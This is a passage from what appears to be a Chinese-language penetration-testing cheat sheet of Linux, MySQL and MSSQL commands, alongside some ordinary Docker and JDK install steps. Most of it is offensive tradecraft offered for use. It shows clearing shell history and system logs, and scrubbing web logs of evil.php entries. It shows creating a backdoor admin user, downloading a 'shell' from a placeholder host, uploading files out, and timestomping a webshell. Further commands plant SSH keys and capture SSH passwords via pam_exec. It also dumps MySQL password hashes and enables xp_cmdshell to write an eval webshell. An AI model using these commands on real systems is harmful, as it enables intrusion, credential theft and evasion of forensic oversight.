//查看某个域的域信任</span><br><span class="line">nslookup -type=SRV _ldap._tcp.corp  //通过srv记录查找域控制器</span><br></pre></td></tr></table></figure><h2 id="Linux-命令速查"><a href="#Linux-命令速查" class="headerlink" title="Linux 命令速查"></a>Linux 命令速查</h2><h2 id="本次不记录命令"><a href="#本次不记录命令" class="headerlink" title="本次不记录命令"></a>本次不记录命令</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0</span><br></pre></td></tr></table></figure><h2 id="常用日志清理"><a href="#常用日志清理" class="headerlink" title="常用日志清理"></a>常用日志清理</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &gt; /var/log/btmp;echo &gt; /var/log/wtmp;echo &gt; /var/log/lastlog;echo &gt; /var/log/utmp;echo &gt; /var/log/syslog;cat /dev/null &gt; /var/log/secure;cat /dev/null &gt; /var/log/message;echo ok</span><br></pre></td></tr></table></figure><ul><li>&#x2F;var&#x2F;log&#x2F;btmp 记录所有登录失败信息，使用lastb命令查看</li><li>&#x2F;var&#x2F;log&#x2F;lastlog 记录系统中所有用户最后一次登录时间的日志，使用lastlog命令查看</li><li>&#x2F;var&#x2F;log&#x2F;wtmp 记录所有用户的登录、注销信息，使用last命令查看</li><li>&#x2F;var&#x2F;log&#x2F;utmp 记录当前已经登录的用户信息，使用w,who,users等命令查看</li><li>&#x2F;var&#x2F;log&#x2F;secure 记录与安全相关的日志信息</li><li>&#x2F;var&#x2F;log&#x2F;message 记录系统启动后的信息和错误日志</li></ul><h2 id="Web-日志清理"><a href="#Web-日志清理" class="headerlink" title="Web 日志清理"></a>Web 日志清理</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">直接替换日志ip地址:</span><br><span class="line">sed -i &#x27;s/127.0.0.1/192.168.1.1/g&#x27; access.log</span><br><span class="line"></span><br><span class="line">清除部分相关日志:</span><br><span class="line">使用grep -v来把相关信息删除:</span><br><span class="line">cat /var/log/nginx/access.log | grep -v evil.php &gt; tmp.log</span><br><span class="line"></span><br><span class="line">把修改过的日志覆盖到原日志文件:</span><br><span class="line">cat tmp.log &gt; /var/log/nginx/access.log</span><br></pre></td></tr></table></figure><h2 id="设置终端代理"><a href="#设置终端代理" class="headerlink" title="设置终端代理"></a>设置终端代理</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890</span><br></pre></td></tr></table></figure><h2 id="查看用户登录记录"><a href="#查看用户登录记录" class="headerlink" title="查看用户登录记录"></a>查看用户登录记录</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">last</span><br></pre></td></tr></table></figure><h2 id="root-权限创建管理员用户"><a href="#root-权限创建管理员用户" class="headerlink" title="root 权限创建管理员用户"></a>root 权限创建管理员用户</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo useradd -m testt &amp;&amp; echo &quot;testt:admin@123&quot; | sudo chpasswd &amp;&amp; sudo usermod -aG wheel testt</span><br></pre></td></tr></table></figure><h2 id="cURL-wget-下载文件"><a href="#cURL-wget-下载文件" class="headerlink" title="cURL&#x2F;wget 下载文件"></a>cURL&#x2F;wget 下载文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget -P /tmp/ http://x.x.x.x:8080/shell</span><br><span class="line">curl -o /tmp/xxx http://x.x.x.x:8080/shell</span><br></pre></td></tr></table></figure><h2 id="curl-wget-发送文件"><a href="#curl-wget-发送文件" class="headerlink" title="curl&#x2F;wget 发送文件"></a>curl&#x2F;wget 发送文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST --data-binary @file.txt http://localhost:9000</span><br><span class="line"></span><br><span class="line">wget --post-file=file.txt http://localhost:9000</span><br><span class="line"></span><br><span class="line">curl -T file.txt http://localhost:9000</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">import socket</span><br><span class="line"></span><br><span class="line">def start_server(host, port, buffer_size=1024):</span><br><span class="line">    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    server_socket.bind((host, port))</span><br><span class="line">    server_socket.listen(5)</span><br><span class="line">    print(f&quot;服务器正在 &#123;host&#125;:&#123;port&#125; 监听...&quot;)</span><br><span class="line"></span><br><span class="line">    while True:</span><br><span class="line">        client_socket, addr = server_socket.accept()</span><br><span class="line">        print(f&quot;连接来自 &#123;addr&#125;&quot;)</span><br><span class="line"></span><br><span class="line">        # 读取HTTP请求头</span><br><span class="line">        request = b&quot;&quot;</span><br><span class="line">        while b&quot;\r\n\r\n&quot; not in request:</span><br><span class="line">            request += client_socket.recv(buffer_size)</span><br><span class="line"></span><br><span class="line">        headers, file_data = request.split(b&quot;\r\n\r\n&quot;, 1)</span><br><span class="line"></span><br><span class="line">        # 提取文件名（可以根据实际需求修改提取方式）</span><br><span class="line">        file_name = &quot;received_file&quot;  # 默认文件名</span><br><span class="line"></span><br><span class="line">        # 保存文件</span><br><span class="line">        with open(file_name, &#x27;wb&#x27;) as f:</span><br><span class="line">            f.write(file_data)</span><br><span class="line">            while True:</span><br><span class="line">                data = client_socket.recv(buffer_size)</span><br><span class="line">                if not data:</span><br><span class="line">                    break</span><br><span class="line">                f.write(data)</span><br><span class="line"></span><br><span class="line">        print(f&quot;文件 &#123;file_name&#125; 已保存&quot;)</span><br><span class="line">        client_socket.close()</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    HOST = &#x27;0.0.0.0&#x27;</span><br><span class="line">    PORT = 9000</span><br><span class="line">    start_server(HOST, PORT)</span><br></pre></td></tr></table></figure><h2 id="文件时间修改"><a href="#文件时间修改" class="headerlink" title="文件时间修改"></a>文件时间修改</h2><blockquote><p>修改 &#x2F;www&#x2F;wwwroot&#x2F;shell.php 时间为 2024.05.16.24</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">touch -t 202405161200.24 /www/wwwroot/shell.php</span><br></pre></td></tr></table></figure><h2 id="查看-DNS-服务器"><a href="#查看-DNS-服务器" class="headerlink" title="查看 DNS 服务器"></a>查看 DNS 服务器</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /etc/resolv.conf</span><br></pre></td></tr></table></figure><h2 id="停止防火墙"><a href="#停止防火墙" class="headerlink" title="停止防火墙"></a>停止防火墙</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">systemctl stop firewalld</span><br><span class="line">service iptables stop</span><br><span class="line"></span><br><span class="line">ubuntu:</span><br><span class="line">ufw disable</span><br></pre></td></tr></table></figure><h2 id="搜索敏感信息"><a href="#搜索敏感信息" class="headerlink" title="搜索敏感信息"></a>搜索敏感信息</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -regex &quot;.*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh|.*\.jsp|.*\.log|.*\.txt|.*\.xml&quot; | xargs grep -E &quot;=jdbc:|pass=|passwd=|aliyun|password&quot;</span><br></pre></td></tr></table></figure><h2 id="echo-写文件"><a href="#echo-写文件" class="headerlink" title="echo 写文件"></a>echo 写文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//直接 echo 写入：</span><br><span class="line">echo xxx &gt; /www/xxx.jsp</span><br><span class="line"></span><br><span class="line">//base64 写入：</span><br><span class="line">echo eHh4ZGFzMQ== | base64 -d &gt; /www/xxx.jsp</span><br><span class="line"></span><br><span class="line">//追加</span><br><span class="line">echo xxx &gt;&gt; /www/xxx.jsp</span><br></pre></td></tr></table></figure><blockquote><p>在线编码：<a href="https://forum.ywhack.com/coding.php">https://forum.ywhack.com/coding.php</a></p></blockquote><h2 id="写入-ssh-公钥："><a href="#写入-ssh-公钥：" class="headerlink" title="写入 ssh 公钥："></a>写入 ssh 公钥：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d &gt; authorized_keys</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//使用  printf 在末尾处插入，如需换行可添加\n</span><br><span class="line">//参考https://baijiahao.baidu.com/s?id=1727019063436737118&amp;wfr=spider&amp;for=pc</span><br><span class="line"></span><br><span class="line">printf &quot;ssh-rsa xxx&quot; &gt;&gt; /root/.ssh/authorized_keys</span><br></pre></td></tr></table></figure><h2 id="压缩打包文件"><a href="#压缩打包文件" class="headerlink" title="压缩打包文件"></a>压缩打包文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//将 /home/mail /home/web 两个目录打包至 /tmp 目录下命名为web.tar.gz</span><br><span class="line">tar czvf /tmp/web.tar.gz /home/mail /home/web</span><br><span class="line"></span><br><span class="line">//zip</span><br><span class="line">zip -r /tmp/web.zip /home/mail /home/web</span><br><span class="line"></span><br><span class="line">//可使用 -x 排除，如:</span><br><span class="line">zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*</span><br></pre></td></tr></table></figure><h2 id="分割上传"><a href="#分割上传" class="headerlink" title="分割上传"></a>分割上传</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">split -n 3 fscan  //分割为 3 个文件</span><br><span class="line">split -b 500k fscan  //以 500 K 大小分割 fscan</span><br><span class="line"></span><br><span class="line">Windows 合并：</span><br><span class="line">copy /b xaa+xab fscan</span><br><span class="line">type xaa xab &gt; fscan</span><br><span class="line"></span><br><span class="line">Linux 合并：</span><br><span class="line">cat xaa xab &gt; fscan</span><br></pre></td></tr></table></figure><h2 id="十六进制获取文件"><a href="#十六进制获取文件" class="headerlink" title="十六进制获取文件"></a>十六进制获取文件</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 将文件转换为十六进制</span><br><span class="line">xxd -p filename </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 本地还原：</span><br><span class="line">xxd -p -r filename &gt; aa.tar.gz</span><br></pre></td></tr></table></figure><h2 id="pam-exec-抓-SSH-密码"><a href="#pam-exec-抓-SSH-密码" class="headerlink" title="pam_exec 抓 SSH 密码"></a>pam_exec 抓 SSH 密码</h2><p>需要关闭 SELinux：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">setenforce 0 # 关闭</span><br><span class="line">setenforce 1 # 开启</span><br></pre></td></tr></table></figure><p>修改 <code>/etc/pam.d/sshd</code>​ 第一行添加：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh</span><br></pre></td></tr></table></figure><p>&#x2F;tmp&#x2F;sshd.sh:</p><blockquote><p><code>chmod 777 /tmp/sshd.sh</code>​</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line"></span><br><span class="line">echo &quot;$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER&quot; &gt;&gt; /tmp/123.log</span><br></pre></td></tr></table></figure><h2 id="Debian-Ubuntu-Docker-安装"><a href="#Debian-Ubuntu-Docker-安装" class="headerlink" title="Debian&#x2F;Ubuntu Docker 安装"></a>Debian&#x2F;Ubuntu Docker 安装</h2><blockquote><p>Debian 12 &#x2F; Ubuntu 24.04 安装 Docker 以及 Docker Compose</p></blockquote><p><strong>安装一些必要的软件包</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt update</span><br><span class="line">apt upgrade -y</span><br><span class="line">apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates</span><br></pre></td></tr></table></figure><p><strong>加入 Docker 的 GPG 公钥和 apt 源</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Debian:</span><br><span class="line">curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor &gt; /usr/share/keyrings/docker-ce.gpg</span><br><span class="line">echo &quot;deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable&quot; &gt; /etc/apt/sources.list.d/docker.list</span><br><span class="line"></span><br><span class="line">Ubuntu:</span><br><span class="line">curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor &gt; /usr/share/keyrings/docker-ce.gpg</span><br><span class="line">echo &quot;deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable&quot; &gt; /etc/apt/sources.list.d/docker.list</span><br></pre></td></tr></table></figure><p>国内机器可以用清华 TUNA 的国内源:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Debian:</span><br><span class="line">curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor &gt; /usr/share/keyrings/docker-ce.gpg</span><br><span class="line">echo &quot;deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable&quot; &gt; /etc/apt/sources.list.d/docker.list</span><br><span class="line"></span><br><span class="line">Ubuntu:</span><br><span class="line">curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor &gt; /usr/share/keyrings/docker-ce.gpg</span><br><span class="line">echo &quot;deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable&quot; &gt; /etc/apt/sources.list.d/docker.list</span><br></pre></td></tr></table></figure><p>然后更新系统后即可安装 Docker CE 和 Docker Compose 插件</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt update</span><br><span class="line">apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin</span><br></pre></td></tr></table></figure><p><strong>安装 Docker Compose</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-Linux-x86_64 &gt; /usr/local/bin/docker-compose</span><br><span class="line">chmod +x /usr/local/bin/docker-compose</span><br></pre></td></tr></table></figure><h2 id="JDK-安装"><a href="#JDK-安装" class="headerlink" title="JDK 安装"></a>JDK 安装</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ubuntu18运行</span><br><span class="line">sudo apt install openjdk-11-jre-headless</span><br><span class="line">sudo apt install openjdk-11-jdk</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">手动</span><br><span class="line">tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz</span><br><span class="line">cd jdk-13.0.2/</span><br><span class="line">pwd</span><br><span class="line">vim /etc/profile</span><br><span class="line"></span><br><span class="line">export JAVA_HOME=/root/jdk-13.0.2</span><br><span class="line">export CLASSPATH=$:CLASSPATH:$JAVA_HOME/lib/ export PATH=$PATH:$JAVA_HOME/bin</span><br><span class="line"></span><br><span class="line">source /etc/profile</span><br></pre></td></tr></table></figure><h2 id="数据库命令速查"><a href="#数据库命令速查" class="headerlink" title="数据库命令速查"></a>数据库命令速查</h2><h2 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h2><h3 id="mysql-查连接-IP"><a href="#mysql-查连接-IP" class="headerlink" title="mysql 查连接 IP"></a>mysql 查连接 IP</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM performance_schema.hosts;</span><br><span class="line">show full processlist;</span><br></pre></td></tr></table></figure><h3 id="mysql-查最大数量表"><a href="#mysql-查最大数量表" class="headerlink" title="mysql 查最大数量表"></a>mysql 查最大数量表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select table_name,table_rows,table_schema,table_comment from  information_schema.tables order by table_rows desc;</span><br></pre></td></tr></table></figure><h3 id="查询-user-字段在哪个库哪个表"><a href="#查询-user-字段在哪个库哪个表" class="headerlink" title="查询 user 字段在哪个库哪个表"></a>查询 user 字段在哪个库哪个表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">SELECT </span><br><span class="line">    TABLE_SCHEMA AS database_name,</span><br><span class="line">    TABLE_NAME AS table_name,</span><br><span class="line">    COLUMN_NAME AS column_name</span><br><span class="line">FROM </span><br><span class="line">    INFORMATION_SCHEMA.COLUMNS</span><br><span class="line">WHERE </span><br><span class="line">    COLUMN_NAME LIKE &#x27;%user%&#x27;;</span><br></pre></td></tr></table></figure><h3 id="统计访问过的表次数"><a href="#统计访问过的表次数" class="headerlink" title="统计访问过的表次数"></a>统计访问过的表次数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//库名,表名,访问次数</span><br><span class="line">select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc; </span><br></pre></td></tr></table></figure><h3 id="查看写入权限"><a href="#查看写入权限" class="headerlink" title="查看写入权限"></a>查看写入权限</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; show global variables like &#x27;%secure%&#x27;;</span><br><span class="line">+------------------+-------+</span><br><span class="line">| Variable_name    | Value |</span><br><span class="line">+------------------+-------+</span><br><span class="line">| secure_auth      | ON    |</span><br><span class="line">| secure_file_priv |          |    可写入</span><br><span class="line">| secure_file_priv | NULL |   不可写入</span><br><span class="line">+------------------+-------+</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SHOW VARIABLES LIKE &quot;secure_file_priv&quot;;</span><br></pre></td></tr></table></figure><ul><li>NULL，表示禁止。</li><li>如果value值有文件夹目录，则表示只允许该目录下文件，测试子目录也不行。</li><li>如果为空，则表示不限制目录。</li></ul><h3 id="不登录执行-sql"><a href="#不登录执行-sql" class="headerlink" title="不登录执行 sql"></a>不登录执行 sql</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql -uaHmin -proot test -e &quot;select now()&quot; -N &gt;H:/work/target1.txt</span><br><span class="line">mysql -uroot -e &quot;show databases;&quot; &gt;1.txt</span><br></pre></td></tr></table></figure><h3 id="基础命令"><a href="#基础命令" class="headerlink" title="基础命令"></a>基础命令</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">显示版本: select version();</span><br><span class="line">显示字符集: select @@character_set_database;</span><br><span class="line">显示数据库: show databases;</span><br><span class="line">显示表名: show tables;</span><br><span class="line">显示字段: show columns from table_name;</span><br><span class="line">显示计算机名: select @@hostname;</span><br><span class="line">系统版本: select @@version_compile_os;</span><br><span class="line">mysql路径: select @@basedir;</span><br><span class="line">数据库路径: select @@datadir;</span><br><span class="line">describe describe table_name;</span><br><span class="line">显示root密码: select User,Password from mysql.user;</span><br><span class="line">导入文件: select load_fie(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);</span><br><span class="line">导出文件: select &#x27;testtest&#x27; into outfile &#x27;/var/www/html/test.txt&#x27; from mysql.user;</span><br><span class="line">开启外连: GRANT ALL PRIVILEGES ON *.* TO &#x27;root&#x27;@&#x27;%&#x27; IDENTIFIED BY &#x27;root&#x27; WITH GRANT OPTION;</span><br><span class="line">mysql安装路径: show variables;   </span><br><span class="line">更新数据库: UPDATE `DX15`.`dx15_common_member` SET `uid` = &#x27;1&#x27; WHERE `dx15_common_member`.`uid` =40407;更新40407uid变成uid1</span><br><span class="line">mysql更改root密码: mysqladmin -u root password &quot;newpwd&quot;;</span><br><span class="line">查询表: select concat(User,0x3a,Password) from mysql.user; </span><br><span class="line">获取数据库所有表: SHOW TABLES FROM `databases`;</span><br><span class="line">获取列前20行: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;</span><br><span class="line">获取表行数: SELECT COUNT(*) AS CNT FROM `dede_admin`;</span><br></pre></td></tr></table></figure><h2 id="sql-server"><a href="#sql-server" class="headerlink" title="sql server"></a>sql server</h2><p>相关工具：</p><ul><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL1NhZmVHcm9jZXJ5U3RvcmUvTURVVA==">MDUT</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3Vrbm93c2VjL1NoYXJwU1FMVG9vbHM=">SharpSQLTools</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL1N5U1MtUmVzZWFyY2gvTUFU">MAT</a></li></ul><h3 id="xp-cmdshell"><a href="#xp-cmdshell" class="headerlink" title="xp_cmdshell"></a>xp_cmdshell</h3><blockquote><p>SQL Server 2005 之前版本，xp_cmdshell 默认开启:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master..xp_cmdshell &#x27;whoami&#x27;;</span><br></pre></td></tr></table></figure><blockquote><p>判断是否存在 xp_cmdshell 存储过程，返回1表示存在，否则表示不存在:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select count(*) from master.dbo.sysobjects where xtype=&#x27;x&#x27; and name=&#x27;xp_cmdshell&#x27;;</span><br></pre></td></tr></table></figure><blockquote><p>删除 xp_cmdshell:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master..sp_dropextendedproc xp_cmdshell;</span><br></pre></td></tr></table></figure><blockquote><p>恢复 xp_cmdshell:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec master..xp_dropextendedproc xp_cmdshell,@dllname=&#x27;xplog70.dll&#x27; declare @o int;</span><br></pre></td></tr></table></figure><blockquote><p>SQL Server 2005之后的版本中，xp_cmdshell 默认关闭，需要手动开启，开启xp_cmdshell需要sa权限:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"># 允许修改高级参数</span><br><span class="line">exec sp_configure &#x27;show advanced options&#x27;,1;</span><br><span class="line"># 配置生效</span><br><span class="line">RECONFIGURE;</span><br><span class="line"># 开启xp_cmdshell</span><br><span class="line">exec sp_configure &#x27;xp_cmdshell&#x27;,1;</span><br><span class="line"># 配置生效</span><br><span class="line">RECONFIGURE;</span><br><span class="line"># 检查是否开启</span><br><span class="line">exec sp_configure;</span><br><span class="line"># 执行系统命令</span><br><span class="line">exec master..xp_cmdshell &#x27;whoami&#x27;;</span><br><span class="line"># 获取webshell</span><br><span class="line">exec master..xp_cmdshell &#x27;echo  ^&lt;%@ Page Language=&quot;Jscript&quot;%^&gt;^&lt;%eval(Request.Item[&quot;pass&quot;],&quot;unsafe&quot;);%^&gt; &gt; c:\\WWW\\test.aspx&#x27;</span><br></pre></td></tr></table></figure><h3 id="MSSQL-默认数据库"><a href="#MSSQL-默认数据库" class="headerlink" title="MSSQL 默认数据库"></a>MSSQL 默认数据库</h3><table><thead><tr><th>Name</th><th>描述</th></tr></thead><tbody><tr><td>pubs</td><td>在 MSSQL 2005 中不可用</td></tr><tr><td>model</td><td>在所有版本中可用</td></tr><tr><td>msdb</td><td>在所有版本中可用</td></tr><tr><td>tempdb</td><td>在所有版本中可用</td></tr><tr><td>northwind</td><td>在所有版本中可用</td></tr><tr><td>information_schema</td><td>从 MSSQL 2000 及更高版本开始可用</td></tr></tbody></table><h3 id="MSSQL-注释"><a href="#MSSQL-注释" class="headerlink" title="MSSQL 注释"></a>MSSQL 注释</h3><table><thead><tr><th>Type</th><th>描述</th></tr></thead><tbody><tr><td>​<code>/* MSSQL Comment */</code>​</td><td>C-style 注释</td></tr><tr><td>​<code>-- -</code>​</td><td>SQL 